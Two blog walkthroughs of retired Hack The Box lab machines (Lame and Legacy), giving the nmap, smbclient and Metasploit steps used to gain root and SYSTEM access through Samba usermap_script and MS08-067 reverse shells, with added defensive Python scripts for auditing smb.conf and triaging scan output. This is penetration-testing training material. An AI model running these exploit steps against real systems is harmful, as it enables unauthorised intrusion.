How I hacked the Linux machine Lame on HTB

In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).

Lame is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.

I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Lame’s IPv4 address. Next to the machine name, we see Tux the penguin and thus know right away that this is a Linux machine.

The first step for this hack is to scan the Lame machine in order to identify its open ports. We run nmap -A -T4 -p- 10.10.10.3

We scan for open ports and we get all the information available on the services that are running behind those ports.

The result shows us that there are five open ports and four services running behind them:

  • FTP (21): File Transfer Protocol. nmap shows that anonymous FTP login is allowed. This would be a finding if this were a penetration test. Anonymous FTP login should not be allowed in general. Using this information, we could connect to the machine via FTP and list the files in the FTP directory. Alternatively, we could check if vsFTPd version 2.3.4 is exploitable.
  • SSH (22): Secure Shell. We could try a brute force attack on SSH. If this were a penetration test, this would show us how good the password policy is and whether the blue team is able to detect us.
  • DISTCC (3632): I had to Google what DISTCC is. According to this post, this service “is designed to speed up compilation by taking advantage of unused processing power on other computers”. Here we could check whether DISTCC v1 is exploitable.
  • SMB (139/445): This is the service that we targeted in our attack on the Windows machine called Legacy. nmap shows that Lame is running Samba 3.0.20-Debian. This is the service that we will target today.

Firstly, we run smbclient -L \\\\10.10.10.3\\

We have access to the share names.

The result in the screenshot tells us that we can list the share names without having a password, because anonymous login is allowed on SMB. This is a juicy finding. If we were able to get into ADMIN$, we would have very good chances of exploiting this machine. Run smbclient \\\\10.10.10.3\\ADMIN$

We cannot access the ADMIN share.

Unfortunately, access to this folder is denied (same result for print$ and opt$, whereas we can get access to IPC$ but we can neither ls nor cd). The remaining folder is tmp. Here we do not get access to vmware-root, and the files .X0-lock and vgauthsvclog.txt.0 do not contain interesting information. PS: I downloaded these files to my machine with smbget -R smb://10.10.10.3/tmp, as cat didn’t work on SMB.

Now open your browser, go to Google and search samba 3.0.20-debian exploit. We open the Rapid7 page called usermap_script. This page explains that using the non-default “username map script” configuration option, we can specify a username containing shell meta characters and then execute arbitrary commands. Moreover, no authentication is needed. This is what we were looking for.
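From the defender's side, the weakness described above is a configuration and patching problem: the non-default “username map script” option and the anonymous access that let us list shares without a password. The following added example (not from the original post) audits an smb.conf for exactly those settings; the two configs are constructed samples, not Lame's real configuration.

```python
import re

# Constructed sample resembling a weak Samba setup (hypothetical values).
WEAK_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = bad user
   username map script = /etc/samba/scripts/mapusers.sh   ; hypothetical path

[tmp]
   path = /tmp
   guest ok = yes
   read only = no
"""

# The same config with the flagged settings corrected (hypothetical hardened form).
HARDENED_CONF = """
[global]
   workgroup = WORKGROUP
   security = user
   map to guest = never

[tmp]
   path = /tmp
   guest ok = no
   read only = yes
"""


def parse_smb_conf(text):
    """Return {section: {key: value}} for smb.conf-style text ('#' and ';' start comments)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";")[0].split("#")[0].strip()
        if not line:
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip().lower()
    return sections


def audit_smb_conf(text):
    """Return a list of findings; an empty list means nothing was flagged."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []
    if "username map script" in g:  # the option abused by the usermap_script module
        findings.append("global: 'username map script' is set; remove it and patch Samba")
    if g.get("map to guest", "never") != "never":  # Samba default is 'never'
        findings.append("global: 'map to guest = %s' permits anonymous sessions" % g["map to guest"])
    for name, opts in conf.items():
        if name != "global" and opts.get("guest ok", "no") == "yes":
            findings.append("share %s: 'guest ok = yes' allows unauthenticated access" % name)
    return findings
```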

Exploit Lame and Catch the Flags

Enter use exploit/multi/samba/usermap_script, set rhosts 10.10.10.3 and set lhost <your tun0 IPv4 address>. Enter run and cross your fingers!

We are root on Lame!

We are in! We are the root user on the machine Lame. Now you just have to find the two flags for users root and makis. I leave this task as a challenge for you.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

Legacy! How I hacked my first machine on HTB

In this blog post, I will show the steps that I took to get root access to the Legacy machine on Hack The Box (HTB).

Legacy is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.

I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.

Create a Connection to the HTB Network

In order to connect to the HTB network, open a terminal tab, go to the folder where you downloaded the connection pack and type openvpn <yourUsername>.ovpn. If you see the line Initialization Sequence Completed, you are good to go. Now open a new terminal tab and type ifconfig. You should see an entry called tun0, which is the name of the VPN interface. Write down its IPv4 address; we will need it later.

Scanning and Enumeration

In real life, the first step for a penetration test is information gathering. During this phase, the pentester gathers information about the target. Because we are hacking a machine on HTB, we will limit ourselves to writing down Legacy’s operating system (Legacy is a Windows machine) and its IPv4 address. This information can be found at https://www.hackthebox.eu/home/machines under Retired Machines > Legacy.

The next step of the pentest process is scanning and enumeration. Here the pentester wants to know which ports on the victim machine are open, that is, which ports are configured to receive packets. Moreover, s/he looks at the services listening on those ports, looks for unpatched vulnerabilities and so on. For scanning and enumeration we are going to use nmap, smbclient (spoiler alert: we are going to exploit an SMB weakness) and Metasploit.

Open a new terminal tab and enter nmap -T4 -p- 10.10.10.4. With this command, we are going to scan all ports on machine 10.10.10.4 (Legacy) with timing 4 (timing is in the range 0-5, where higher is faster).

We just look for open ports as first step.

This first scan tells us that ports 139/445 (SMB) and 3389 (RDP) are open. Now that we know this, let’s list more information about them. Enter nmap -A -T4 -p 139,445,3389 10.10.10.4, where -A lists all the information available for each specified port.

Now we get more information for ports 139/445 and 3389.

The most important information that we get from this second scan is that the target computer is running Windows XP (you see this information under smb-os-discovery).

Now we will focus on SMB which is a network file sharing protocol that has been vulnerable on Windows in the past. Our goal is to gather information about SMB on this machine. The first thing we can do is try accessing SMB resources on the target. Enter smbclient -L \\\\10.10.10.4\\

Our goal is to access SMB file shares on Legacy.

This attempt was unsuccessful, because the login is protected by a password. The next thing we can try is to find out which SMB version Legacy is running. In order to do this, we will use Metasploit. Run msfconsole to start the service. Then enter search smb. As we are looking for the SMB version, we enter use auxiliary/scanner/smb/smb_version. Now we set up the remote host with set rhosts 10.10.10.4 and run this program.

We scan in order to find out the SMB version.

Unfortunately, we do not get any information about the SMB version, but we get to learn that the host is running Service Pack 3 of Windows XP. This is an important finding, because it allows us to look for an exploit for a specific service pack.
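The scanning steps above are also what a defender runs against their own network to find hosts like Legacy before anyone else does. The following added example (not from the original post) parses nmap's greppable output (-oG) and flags exposed SMB/RDP ports and end-of-life OS banners; the scan output is a constructed sample modelled on the two Legacy scans, and the version strings in it are hypothetical.

```python
# Constructed sample in nmap -oG format (tab-separated fields), modelled on the scans above.
SAMPLE_OG = """\
# Nmap scan initiated (constructed sample)
Host: 10.10.10.4 ()\tStatus: Up
Host: 10.10.10.4 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Windows XP microsoft-ds/, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (65532)
Host: 10.10.10.9 ()\tStatus: Up
Host: 10.10.10.9 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1/
# Nmap done (constructed sample)
"""

# Ports the walkthrough uses as the way in; exposing them to untrusted networks is the finding.
WATCH_PORTS = {139: "SMB (NetBIOS)", 445: "SMB", 3389: "RDP"}
# Banner fragments indicating an operating system that no longer receives patches.
EOL_OS_MARKERS = ("windows xp", "windows 2000", "windows server 2003")


def parse_greppable(text):
    """Return {host: [(port, state, service, version), ...]} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:")[1].split("\t")[0]
        for entry in ports_field.split(","):
            # entry layout: port/state/proto/owner/service/rpcinfo/version/
            fields = entry.strip().split("/")
            if len(fields) < 7:
                continue
            hosts.setdefault(host, []).append(
                (int(fields[0]), fields[1], fields[4], fields[6]))
    return hosts


def triage(text):
    """Return {host: [finding, ...]} for exposed SMB/RDP ports and EOL OS banners."""
    findings = {}
    for host, ports in parse_greppable(text).items():
        for port, state, service, version in ports:
            if state != "open":
                continue
            if port in WATCH_PORTS:
                findings.setdefault(host, []).append(
                    "%s exposed on %d/tcp" % (WATCH_PORTS[port], port))
            if any(m in version.lower() for m in EOL_OS_MARKERS):
                findings.setdefault(host, []).append(
                    "end-of-life OS banner on %d/tcp: %s" % (port, version))
    return findings
```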

Now open your browser, go to Google and search smb windows XP SP3 exploit. One of the first pages that show up is https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi . Rapid7 pages are very helpful as they explain the specific vulnerability and show you the commands that you have to run with Metasploit in order to exploit that vulnerability. The reason behind this “service” is that the Metasploit Project is a collaboration between the open source community and the company Rapid7.

Exploit Legacy and Catch the Flags

It is time to hack into Legacy. In this exploit, we are going to open a reverse shell. This means that the victim connects back to us (the attacker). This image by https://www.hackingtutorials.org/ visualizes this concept:

The idea behind a reverse shell.

Enter use exploit/windows/smb/ms08_067_netapi and then set up RHOST (the victim’s IP address) and LHOST (the attacker’s IP address). This step is very important as the default settings use your machine default IP address as LHOST (it took a while for me to find this problem), whereas you need the tun0 IPv4 address in order to hack into Legacy successfully. Enter set rhosts 10.10.10.4 and set lhost <your tun0 IPv4 address>. Enter run and cross your fingers!

The exploit was successful and we are now NT AUTHORITY\SYSTEM.

If everything worked fine, you should see something similar to the screenshot above. NT AUTHORITY\SYSTEM means that we now have the highest privilege level in Windows, which is equivalent to the root user in Linux. Next you have to look for the flags of the users “john” and “Administrator” and submit them on HTB in order to own the Legacy machine. I leave this task as a challenge for you.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!